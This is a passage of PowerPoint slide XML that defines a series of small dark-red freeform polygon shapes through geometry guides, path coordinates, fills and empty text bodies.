                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10876" name="Freeform 282"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3372"/>
                  <a:ext cx="35" cy="63"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 32 h 63"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 63 h 63"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 29 h 63"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 63"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 32 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 63"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 63 h 63"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="63">
                      <a:moveTo>
                        <a:pt x="35" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="63"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="32"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10877" name="Freeform 283"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3338"/>
                  <a:ext cx="35" cy="60"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 32 h 60"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 60 h 60"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 28 h 60"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 60"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 32 h 60"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 60"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 60 h 60"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="60">
                      <a:moveTo>
                        <a:pt x="35" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="32"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10878" name="Freeform 284"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2593" y="3302"/>
                  <a:ext cx="35" cy="61"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 35 h 61"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 61 h 61"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 29 h 61"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 61"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 35 h 61"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 61"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 61 h 61"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="61">
                      <a:moveTo>
                        <a:pt x="35" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="35"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10879" name="Freeform 285"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3286"/>
                  <a:ext cx="17" cy="42"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 14 h 42"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 42 h 42"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 26 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 42"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 14 h 42"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 42"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 42 h 42"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="42">
                      <a:moveTo>
                        <a:pt x="17" y="14"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="14"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10880" name="Freeform 286"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3479"/>
                  <a:ext cx="11" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 11"/>
                    <a:gd name="T1" fmla="*/ 13 h 44"/>
                    <a:gd name="T2" fmla="*/ 11 w 11"/>
                    <a:gd name="T3" fmla="*/ 44 h 44"/>
                    <a:gd name="T4" fmla="*/ 0 w 11"/>
                    <a:gd name="T5" fmla="*/ 32 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 11"/>
                    <a:gd name="T7" fmla="*/ 0 h 44"/>
                    <a:gd name="T8" fmla="*/ 11 w 11"/>
                    <a:gd name="T9" fmla="*/ 13 h 44"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 11"/>
                    <a:gd name="T16" fmla="*/ 0 h 44"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 44 h 44"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="11" h="44">
                      <a:moveTo>
                        <a:pt x="11" y="13"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="13"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10881" name="Freeform 287"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3443"/>
                  <a:ext cx="35" cy="65"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 35 h 65"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 65 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 29 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 35 h 65"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 65"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 65 h 65"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="65">
                      <a:moveTo>
                        <a:pt x="35" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="35"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10882" name="Freeform 288"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3405"/>
                  <a:ext cx="35" cy="65"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 37 h 65"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 65 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 30 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 37 h 65"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 65"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 65 h 65"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="65">
                      <a:moveTo>
                        <a:pt x="35" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="37"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10883" name="Freeform 289"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="3369"/>
                  <a:ext cx="34" cy="63"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 35 h 63"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 63 h 63"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 63"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 63"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 35 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 63"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 63 h 63"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="63">
                      <a:moveTo>
                        <a:pt x="34" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="63"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="35"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="200000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10884" name="Freeform 290"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3352"/>
                  <a:ext cx="17" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 16 h 44"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 44 h 44"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 24 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 44"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 16 h 44"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 44"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 44 h 44"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="44">
                      <a:moveTo>
                        <a:pt x="17" y="16"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="16"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10885" name="Freeform 291"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3383"/>
                  <a:ext cx="29" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 29"/>
                    <a:gd name="T1" fmla="*/ 30 h 55"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 55 h 55"/>
                    <a:gd name="T4" fmla="*/ 0 w 29"/>
                    <a:gd name="T5" fmla="*/ 27 h 55"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 0 h 55"/>
                    <a:gd name="T8" fmla="*/ 29 w 29"/>
                    <a:gd name="T9" fmla="*/ 30 h 55"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 29"/>
                    <a:gd name="T16" fmla="*/ 0 h 55"/>
                    <a:gd name="T17" fmla="*/ 29 w 29"/>
                    <a:gd name="T18" fmla="*/ 55 h 55"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
